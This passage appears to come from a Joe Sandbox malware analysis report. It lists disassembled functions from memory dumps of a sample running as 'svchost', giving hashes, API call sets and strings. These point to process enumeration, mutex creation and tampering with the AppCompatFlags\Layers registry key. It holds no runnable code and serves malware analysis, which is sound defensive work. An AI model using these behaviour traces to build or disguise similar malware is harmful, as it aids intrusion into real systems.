                                                      • Opcode Fuzzy Hash: 44286c134b029a49fbd98e52ac3d62de1c89178b32646424a1c650f1b3a6d2cf
                                                      • Instruction Fuzzy Hash: 0321A2B070AE086EF3696B5CB8427F972D0EB86720F050659F097C76D7D6A8580182EB
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                      • String ID: csm
                                                      • API String ID: 1546832303-1018135373
                                                      • Opcode ID: 318814a81c34ddbc9fdd873e733cdffc2da081c5b938eaa1a7ece9fcdc15d50c
                                                      • Instruction ID: 0a1555417fe1b9f0fed2d307b5be55228387487e32c5442b8fa2b8409347c6ed
                                                      • Opcode Fuzzy Hash: 318814a81c34ddbc9fdd873e733cdffc2da081c5b938eaa1a7ece9fcdc15d50c
                                                      • Instruction Fuzzy Hash: 97316D71218A048FEB65EF4CE4417AA77E1FB99710F50055DD4CAC3A92D739B842CB87
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd_noexit$__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 1789918242-0
                                                      • Opcode ID: d6ce03e6b060e43d1d524192b8fdd189dd33d3aeff32cba8491392d779f6d76c
                                                      • Instruction ID: 5fe66feb3c11bbdb3e0273824ebb3533b0d4734533b43abcc3f203c4aeb1a044
                                                      • Opcode Fuzzy Hash: d6ce03e6b060e43d1d524192b8fdd189dd33d3aeff32cba8491392d779f6d76c
                                                      • Instruction Fuzzy Hash: F721FCB220AE045EF32A9B1CAC813E875D0DB43722F16055CE197C79D3C9BC584083DB
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd_noexit$__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 75911684-0
                                                      • Opcode ID: 191b44ddcdda7e7db2db98606f9b9744266b5c9c12ced36634c24477dfeaf23f
                                                      • Instruction ID: 082a0466afde9bb3850d00c0593b9c11c2c96bca7adfeef100d519194c15513b
                                                      • Opcode Fuzzy Hash: 191b44ddcdda7e7db2db98606f9b9744266b5c9c12ced36634c24477dfeaf23f
                                                      • Instruction Fuzzy Hash: E421C532608A4845F7936F2598013ED75507789BF0F69C714BEB50B3D2CFB88649C760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd_noexit$__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 1789918242-0
                                                      • Opcode ID: a43c7a7360c7c8bd12849c2e3308150c4a3f615a40afda899ff6dd190ba4f4c6
                                                      • Instruction ID: e08694646e838dae24bee4e0541d44834c1e2e836c11a0c128ffef97defdb4c5
                                                      • Opcode Fuzzy Hash: a43c7a7360c7c8bd12849c2e3308150c4a3f615a40afda899ff6dd190ba4f4c6
                                                      • Instruction Fuzzy Hash: 6F11083260864C46F387EF34A8857EC3650AB897E0F6ADA24F915473D3DE78C7498315
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd
                                                      • String ID: MOC$RCC$csm
                                                      • API String ID: 3186804695-2671469338
                                                      • Opcode ID: 68a62a30ac964d4d124b7cb3d948c13e3dfb564b89cd10a3adaf558711248c99
                                                      • Instruction ID: a48baf1fa0f478404f5555a2abecc319476755744136d49d048aab61f187a742
                                                      • Opcode Fuzzy Hash: 68a62a30ac964d4d124b7cb3d948c13e3dfb564b89cd10a3adaf558711248c99
                                                      • Instruction Fuzzy Hash: 35F012B43229088EFF676768900D3E531D0AB17B06F4544A1D5C6C79A3D7AC1994CADB
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd
                                                      • String ID: MOC$RCC$csm
                                                      • API String ID: 3186804695-2671469338
                                                      • Opcode ID: fd417adaab07dff1f772147f418f912634d25a0768b647d98fc5c6434095e6c1
                                                      • Instruction ID: 01aa6a6a228c3c0a0aba81317d871d0cc4a97d627d213273933d2298baaac784
                                                      • Opcode Fuzzy Hash: fd417adaab07dff1f772147f418f912634d25a0768b647d98fc5c6434095e6c1
                                                      • Instruction Fuzzy Hash: 8FF06D3650518CC6F7F7AB6480053ED32A1E79E786F8AC461A20157382CFBC4B888B12
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$Locale$StringUpdateUpdate::___crt_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2056426365-0
                                                      • Opcode ID: bdec36b018143d8b9f441de29b73c1729632761a3c52747f4addeb704b0542f9
                                                      • Instruction ID: dbacb9a966791337a7a3571a3cd5091bb37a6f08850fbe0ebabdade80be3bcf5
                                                      • Opcode Fuzzy Hash: bdec36b018143d8b9f441de29b73c1729632761a3c52747f4addeb704b0542f9
                                                      • Instruction Fuzzy Hash: 7741D0B021DF854AF7A69B2C90447AA7BD0EB97704F14056DE8C7C7682DA68C845C3C7
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                      • String ID:
                                                      • API String ID: 1547050394-0
                                                      • Opcode ID: 5bc052bb088fd35b5b602d92a9fa76e5213f3ee36b81a9307476737899bce9a8
                                                      • Instruction ID: 45323133db474b821f74aa5c339369f79413a9d95e479c2580f060aa18684424
                                                      • Opcode Fuzzy Hash: 5bc052bb088fd35b5b602d92a9fa76e5213f3ee36b81a9307476737899bce9a8
                                                      • Instruction Fuzzy Hash: FA2124F0709F0A4FF796AB3C64013AA76D1EB9A710F15056AE4C6C3692DE68CC4087DB
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$Locale$StringUpdateUpdate::___crt_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2056426365-0
                                                      • Opcode ID: 9c87a11a63088c015eef93d34a9913030e38673030c7ee5cd4f8d2b3a46e3baf
                                                      • Instruction ID: 1be74027af8b6ec6c48b4e2238035b7b216e12fb5bcc336f95e9ea6e429cc1f7
                                                      • Opcode Fuzzy Hash: 9c87a11a63088c015eef93d34a9913030e38673030c7ee5cd4f8d2b3a46e3baf
                                                      • Instruction Fuzzy Hash: E841A672A086C885FB93CB14A1543ED7B91E7497C4F18C525FBC5477AADF68C649C700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd_noexit$__lock_fhandle_errno_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 1756211493-0
                                                      • Opcode ID: 1b0ba3c125c53c84a92fdf2b06e9d539b91ec996238f7a8b4ac5e6912e78a014
                                                      • Instruction ID: 4e1bccfebcbb578e6bf95df4e748da87392a1d0a41134f910bd643ed404b3cb0
                                                      • Opcode Fuzzy Hash: 1b0ba3c125c53c84a92fdf2b06e9d539b91ec996238f7a8b4ac5e6912e78a014
                                                      • Instruction Fuzzy Hash: DB210AB0709E045EF31A675CB8523FC32D0EB83B20F050548E4D7C75D7D6A8580182DB
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$__lock_fhandle_getptd_noexit_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 4059150367-0
                                                      • Opcode ID: d141b6cd3c406fd51616224ba368c67d72d3d4b9d916106288e607afb7bc7dfb
                                                      • Instruction ID: 2a317e5316f1248ca5c790bdd32c790891a4854f1a768989e57986f8a2a23aee
                                                      • Opcode Fuzzy Hash: d141b6cd3c406fd51616224ba368c67d72d3d4b9d916106288e607afb7bc7dfb
                                                      • Instruction Fuzzy Hash: 5A2106B0306E0D6EF25D6B6CB4A13ED6AD0EB46710F050158F597C76D2D6AC484083DA
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd_noexit$__lock_fhandle_errno_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 1756211493-0
                                                      • Opcode ID: aac41a0a3dfb51fb9092f1db34bf2a66c7239750bbc3eb0fb3967f55c5b8c638
                                                      • Instruction ID: b0a076d32d68be970e85eeccf50f05f21c503c7fcd5b896e6cb055075171bb88
                                                      • Opcode Fuzzy Hash: aac41a0a3dfb51fb9092f1db34bf2a66c7239750bbc3eb0fb3967f55c5b8c638
                                                      • Instruction Fuzzy Hash: 9821F332604A4846F793AF29A8413FD3650BB8DBE0F69C514BA550B3D3CFB8CB499720
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                      • String ID:
                                                      • API String ID: 1547050394-0
                                                      • Opcode ID: 8047b00c799ff5ef388ddbb9f50d5c2f7bb82dfb21c80998bbceadc7a6e55cd0
                                                      • Instruction ID: c417f0d506a9a6e526307632f1ff71945366ff5d56bda7028e7266b9faa843bf
                                                      • Opcode Fuzzy Hash: 8047b00c799ff5ef388ddbb9f50d5c2f7bb82dfb21c80998bbceadc7a6e55cd0
                                                      • Instruction Fuzzy Hash: B221C37171478A41FBA3DB21A80139EB690A79EBD0F04D420BA4D97B87DF3CC7458712
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseCreateExceptionFirstHandleNextSnapshotThrowToolhelp32memmove_s
                                                      • String ID:
                                                      • API String ID: 2070426160-0
                                                      • Opcode ID: 432c5b36e9222c5f2b04d3049547f65da605255b8839af9f6800abb27225b9f5
                                                      • Instruction ID: deb589468144d4d24d29fc67ccc3faf017256210460a192db9f6d27b3c9be20f
                                                      • Opcode Fuzzy Hash: 432c5b36e9222c5f2b04d3049547f65da605255b8839af9f6800abb27225b9f5
                                                      • Instruction Fuzzy Hash: 01C1BF32700A4886EB97DB25D4553EE77A4E74CBE4F048226FA69476E5CF38CA89C740
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _lock$_calloc_crt_mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 3962633935-0
                                                      • Opcode ID: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
                                                      • Instruction ID: 32961fa9622572a918bd47560ade871a3e4549e7cfad124c11412907a5293d5c
                                                      • Opcode Fuzzy Hash: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
                                                      • Instruction Fuzzy Hash: BF5104B0619F0C9BE7189F1CE8813E5B3D0FB59710F11015DE88BC76A2D638D8428ACB
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 2998201375-0
                                                      • Opcode ID: 5466015a77196f569951c27b764923028f559785feb8afd6911463fc7175fde2
                                                      • Instruction ID: 4e83a7bfb4e8c8ad68e4d1d2500786b75b5026e94a1c92e57826ff4685488a1b
                                                      • Opcode Fuzzy Hash: 5466015a77196f569951c27b764923028f559785feb8afd6911463fc7175fde2
                                                      • Instruction Fuzzy Hash: D141B332208B8486E7A2CF15E5903A977A5F748BC4F14C125FB8957B95DF38C6558700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd$_inconsistency$_getptd_noexit
                                                      • String ID:
                                                      • API String ID: 3003190580-0
                                                      • Opcode ID: b5479a7c54eb2bfe29ab996b0a4a5494bdafe09a8fce9f3b8610da9c17d215e3
                                                      • Instruction ID: 24e6d07d7812dbbe442afc52073cfb4d1bef7f39846c06784fb9029d4543452c
                                                      • Opcode Fuzzy Hash: b5479a7c54eb2bfe29ab996b0a4a5494bdafe09a8fce9f3b8610da9c17d215e3
                                                      • Instruction Fuzzy Hash: 34F012B1325D094EFBB2EB5CE081BE967D0FB4DB00F4401E4E18AC7687E5689850879A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                      • String ID:
                                                      • API String ID: 3669027769-0
                                                      • Opcode ID: 5256d530cf8fb0733b6c45ef725c6028a4fdbb7ed0a467f135b8230d2b8f0db7
                                                      • Instruction ID: 93d00fa1b07646867e598b62ce68de74e87f64fd6bccb6a10b21d916c29cf2e0
                                                      • Opcode Fuzzy Hash: 5256d530cf8fb0733b6c45ef725c6028a4fdbb7ed0a467f135b8230d2b8f0db7
                                                      • Instruction Fuzzy Hash: 01F0F83220868990EAE3EBA5E1413FC72A0BB4DBC0F9CC121F6C407687DE20C698A310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                      • String ID: csm
                                                      • API String ID: 2821275340-1018135373
                                                      • Opcode ID: 202e796deccf727fed01be6fe4bf2f3972181cc28ff062ca8e6bd5ec0cdf9c9c
                                                      • Instruction ID: 4629cb29690b4cdf50218ceb6374ab64983d97bdfaee84458ffefbbaa7985651
                                                      • Opcode Fuzzy Hash: 202e796deccf727fed01be6fe4bf2f3972181cc28ff062ca8e6bd5ec0cdf9c9c
                                                      • Instruction Fuzzy Hash: E10152B0212D0D4FEBA8EF5C98C47F83395FB19711F401165E84AC7A82DA699891CB86
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                      • String ID: csm
                                                      • API String ID: 2821275340-1018135373
                                                      • Opcode ID: 7a857e1845d70c2f1e5f6804da9a529f8c5d020c3f18e8610798c0053a23aa55
                                                      • Instruction ID: 9cd088e2127e12a35e9e8c2f70f68ea196f33fdfc55e2358cdbc67d2aa166ec7
                                                      • Opcode Fuzzy Hash: 7a857e1845d70c2f1e5f6804da9a529f8c5d020c3f18e8610798c0053a23aa55
                                                      • Instruction Fuzzy Hash: 38016233100A49C9EBA2EF31C8813ED33A4E74DBD8F449521FA4D4A749DE20DA88C341
                                                      APIs
                                                      Strings
                                                      • Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers, xrefs: 0000000180001681
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValue
                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
                                                      • API String ID: 849931509-1966416226
                                                      • Opcode ID: 576077573795a395ca207de0159431a879f6a68bb6cbe38a081e799d34acbc28
                                                      • Instruction ID: 66a7aa45e8abdeec823b389cadaca9be84f8538ef03a33af900ba0b2d752987a
                                                      • Opcode Fuzzy Hash: 576077573795a395ca207de0159431a879f6a68bb6cbe38a081e799d34acbc28
                                                      • Instruction Fuzzy Hash: C7014471724B4486EB828B25F89475A7360FB8CBD4F405125FE9B47768DF68C6588700
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastMutexOpen$Sleep$CreateThread_wcsftime_lsprintf
                                                      • String ID: 5-2
                                                      • API String ID: 1340651867-891090182
                                                      • Opcode ID: 75d49f292586f665f06d7c91a419348743d5eab30d4fce118a7bc9160b32fb07
                                                      • Instruction ID: 84f20dae55dd682c76dce56c8f0ba95abba88ee20439183f8e5b207b28591710
                                                      • Opcode Fuzzy Hash: 75d49f292586f665f06d7c91a419348743d5eab30d4fce118a7bc9160b32fb07
                                                      • Instruction Fuzzy Hash: 2E017931A1494982F7D7EB71ED523DA3255AB9C3C5F84C126B90E861F6EE28CB0D8750
                                                      APIs
                                                      • _callnewh.LIBCMT ref: 0000000180007EA6
                                                      • malloc.LIBCMT ref: 0000000180007EB2
                                                        • Part of subcall function 0000000180007414: _FF_MSGBANNER.LIBCMT ref: 0000000180007444
                                                        • Part of subcall function 0000000180007414: _NMSG_WRITE.LIBCMT ref: 000000018000744E
                                                        • Part of subcall function 0000000180007414: HeapAlloc.KERNEL32(?,?,00000000,000000018000BDCC,?,?,?,000000018000F4C0,?,?,?,000000018000F3BF,?,?,00000000,000000018000A256), ref: 0000000180007469
                                                        • Part of subcall function 0000000180007414: _callnewh.LIBCMT ref: 0000000180007482
                                                        • Part of subcall function 0000000180007414: _errno.LIBCMT ref: 000000018000748D
                                                        • Part of subcall function 0000000180007414: _errno.LIBCMT ref: 0000000180007498
                                                      • _CxxThrowException.LIBCMT ref: 0000000180007EFB
                                                        • Part of subcall function 00000001800083A8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180006345), ref: 0000000180008437
                                                        • Part of subcall function 00000001800083A8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180006345), ref: 0000000180008476
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                      • String ID: bad allocation
                                                      • API String ID: 1214304046-2104205924
                                                      • Opcode ID: 83299bb98c5ba274bebe642ff6e9d456f243cf94dafa81c08a6ffed90b0717de
                                                      • Instruction ID: 8c456ec7b0dfa129b78a71529ed360227697a22e1ce351fcfc27dcdf84fd50ae
                                                      • Opcode Fuzzy Hash: 83299bb98c5ba274bebe642ff6e9d456f243cf94dafa81c08a6ffed90b0717de
                                                      • Instruction Fuzzy Hash: 45F04971701B4E40EEA6D740A4013D563A4F79C3C4F448421AA8D06697EE3CC34CCB01
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$_errno_invalid_parameter_noinfo
                                                      • String ID: 13a.$83y.$dh74
                                                      • API String ID: 497604498-3522534043
                                                      • Opcode ID: b06f836396c8decc4b724427a3c82975a05fcb9bcb80fa40c0f4ad766a3eab19
